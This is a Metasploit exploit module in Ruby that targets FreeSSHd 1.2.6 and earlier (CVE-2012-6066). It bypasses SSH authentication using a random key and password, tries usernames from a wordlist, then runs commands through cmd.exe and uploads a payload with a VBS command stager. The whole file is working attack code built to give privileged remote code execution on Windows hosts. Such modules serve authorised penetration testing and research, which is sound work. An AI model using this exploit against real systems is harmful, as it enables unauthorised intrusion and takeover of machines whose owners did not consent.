##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => "Freesshd Authentication Bypass",
        'Description'    => %q{
            This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass
          authentication. You just need the username (which defaults to root). The exploit
          has been tested with both password and public key authentication.
        },
        'License'        => MSF_LICENSE,
        'Author'         =>
          [
            'Aris', # Vulnerability discovery and Exploit
            'kcope', # 2012 Exploit
            'Daniele Martini <cyrax[at]pkcrew.org>' # Metasploit module
          ],
        'References'     =>
          [
            [ 'CVE', '2012-6066' ],
            [ 'OSVDB', '88006' ],
            [ 'BID', '56785' ],
            [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html' ],
            [ 'URL', 'http://seclists.org/fulldisclosure/2010/Aug/132' ]
          ],
        'Platform'       => 'win',
        'Privileged'     => true,
        'DisclosureDate' => "Aug 11 2010",
        'Targets' =>
          [
            [ 'Freesshd <= 1.2.6 / Windows (Universal)', {} ]
          ],
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        Opt::RPORT(22),
        OptString.new('USERNAME', [false, 'A specific username to try']),
        OptPath.new(
          'USER_FILE',
          [
            true,
            "File containing usernames, one per line",
            # Defaults to unix_users.txt, because this is the closest one we can try
            File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt")
          ]
        )
      ]
    )
  end

  def check
    connect
    banner = sock.recv(30)
    disconnect
    if banner.match?(/SSH\-2\.0\-WeOnlyDo/)
      version = banner.split(" ")[1]
      return Exploit::CheckCode::Appears if version.match?(/(2\.1\.3|2\.0\.6)/)
      return Exploit::CheckCode::Detected
    end
    Exploit::CheckCode::Safe
  end

  def execute_command(cmd, _opts = {})
    @connection.exec!("cmd.exe /c " + cmd)
  end

  def setup_ssh_options
    {
      password: rand_text_alpha(8),
      port: datastore['RPORT'],
      timeout: 1,
      proxies: datastore['Proxies'],
      key_data: OpenSSL::PKey::RSA.new(2048).to_pem,
      auth_methods: ['publickey']
    }
  end

  def do_login(username, options)
    print_status("Trying username '#{username}'")
    options[:username] = username

    transport = Net::SSH::Transport::Session.new(datastore['RHOST'], options)
    auth = Net::SSH::Authentication::Session.new(transport, options)
    auth.authenticate("ssh-connection", username, options[:password])
    connection = Net::SSH::Connection::Session.new(transport, options)
    begin
      Timeout.timeout(10) do
        connection.exec!('cmd.exe /c echo')
      end
    rescue Timeout::Error
      print_status("Timeout")
      return nil
    rescue RuntimeError
      return nil
    end
    connection
  end

  #
  # Cannot use the auth_brute mixin, because if we do, a payload handler won't start.
  # So we have to write our own each_user here.
  #
  def each_user
    user_list = []
    if datastore['USERNAME'] && !datastore['USERNAME'].empty?
      user_list << datastore['USERNAME']
    else
      f = File.open(datastore['USER_FILE'], 'rb')
      buf = f.read
      f.close

      user_list = (user_list | buf.split).uniq
    end

    user_list.each do |user|
      yield user
    end
  end

  def exploit
    options = setup_ssh_options

    @connection = nil

    each_user do |username|
      next if username.empty?
      @connection = do_login(username, options)
      break if @connection
    end

    if @connection
      print_status("Uploading payload, this may take several minutes...")
      execute_cmdstager(flavor: :vbs, decoder: default_decoder(:vbs), linemax: 1700)
    end
  end
end
